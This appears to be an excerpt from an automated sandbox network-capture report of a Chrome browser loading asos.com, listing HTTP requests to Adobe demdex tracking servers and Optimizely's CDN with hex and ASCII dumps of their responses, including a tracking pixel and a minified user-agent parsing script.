                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"16517622310589015242779979940996246389","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      59192.168.2.164985352.17.200.404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:19 UTC625OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=16517622310589015242779979940996246389&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1729807636417 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:19 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: heOvJpp+Szs=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-085fb57a6.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:19 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:19 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"16517622310589015242779979940996246389","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      60192.168.2.164990052.208.241.2104436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:34 UTC661OUTGET /ibs:dpid=411&dpuuid=ZxrFJQAAAFqFsAN- HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                                      Content-Length: 42
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: fbJ6x9riQLI=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-1-v067-09aebd3ae.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: dpm=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:35 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:35 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      61192.168.2.1649901104.18.65.574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:34 UTC531OUTGET /js/19181552552.js HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      x-amz-id-2: AJpeHwwnTlesAUV0jG/iimpFAf3wk4SG3FQ9VWdF/mA82TF+ESjHtfnmLx21AczbcRvJ87HGXUA=
                                                                                                                                                                                                                                                                                      x-amz-request-id: KBVHJYZ1XSD4PH2Q
                                                                                                                                                                                                                                                                                      x-amz-replication-status: PENDING
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 24 Oct 2024 10:45:21 GMT
                                                                                                                                                                                                                                                                                      ETag: W/"71f21737a383c3ed84dfaea4ba05a736"
                                                                                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                      Cache-Control: max-age=120
                                                                                                                                                                                                                                                                                      x-amz-meta-revision: 72943
                                                                                                                                                                                                                                                                                      x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                                      x-amz-version-id: BiMrJGRF4C3FwxFdnK0uSmJl4bDUmafF
                                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                      Age: 66
                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d47d40c4dcb76-DFW
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC457INData Raw: 37 63 30 38 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 35 32 35 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                                      Data Ascii: 7c08/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={5251:function(t,n,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 22 2c 44 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 4d 3d 22 53 68 61 72 70 22 2c 50 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 55 3d 22 5a 65 62 72 61 22 2c 56 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 7b 7d 2c 65 3d 30 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 6e 5b 74 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 3d 3d 3d 73 26 26 2d 31 21 3d 3d 7a 28 6e 29 2e 69 6e 64 65 78 4f 66 28 7a 28 74 29 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                      Data Ascii: ",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(t){for(var n={},e=0;e<t.length;e++)n[t[e].toUpperCase()]=t[e];return n},B=function(t,n){return typeof t===s&&-1!==z(n).indexOf(z(t))},z=function(t){return
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2a 29 2f 69 2c 2f 28 61 76 61 6e 74 20 7c 69 65 6d 6f 62 69 6c 65 7c 73 6c 69 6d 29 28 3f 3a
                                                                                                                                                                                                                                                                                      Data Ascii: \/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\.]*)/i,/(avant |iemobile|slim)(?:
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72 7c 62 61 69 64 75 62 6f 78 61 70 70 7c 32 33 34 35 45 78 70 6c 6f 72 65 72 29 5b 5c 2f 20 5d 3f 28
                                                                                                                                                                                                                                                                                      Data Ascii: lus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser|baiduboxapp|2345Explorer)[\/ ]?(
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 24 2f 69 2c 2f 28 66 69 72 65 66 6f 78 29 5c 2f 28 5b 5c 77 5c 2e
                                                                                                                                                                                                                                                                                      Data Ascii: /ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\/([-\w\.]+)$/i,/(firefox)\/([\w\.
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 52 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72 29 28 5b 2d 5c 77 20 5d 2b 29 5b 3b 5c 29 5d 2f 69 2c 2f 5c 62 28 6e 65 78 75 73 20 36 70 7c 5c 77
                                                                                                                                                                                                                                                                                      Data Ascii: (ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,M],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,R],[d,_]],[/(?:huawei|honor)([-\w ]+)[;\)]/i,/\b(nexus 6p|\w
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 43 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 70 69 78 65 6c 20 63 29 5c 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 6b
                                                                                                                                                                                                                                                                                      Data Ascii: i/i],[f,[v,C],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"],[d,m]],[/(pixel c)\b/i],[f,[v,k
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29 2f 69 2c 2f 28 6d 69 63 72 6f 73 6f 66 74 29 3b 20 28 6c 75 6d 69 61 5b 5c 77 20 5d 2b 29 2f 69 2c
                                                                                                                                                                                                                                                                                      Data Ascii: ,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)/i,/(microsoft); (lumia[\w ]+)/i,
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:35 UTC1369INData Raw: 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 4c 76 54 65 6c 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 70 68 2d 31 29 20 2f 69 5d 2c
                                                                                                                                                                                                                                                                                      Data Ascii: ],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,"LvTel"],f,[d,m]],[/\b(ph-1) /i],
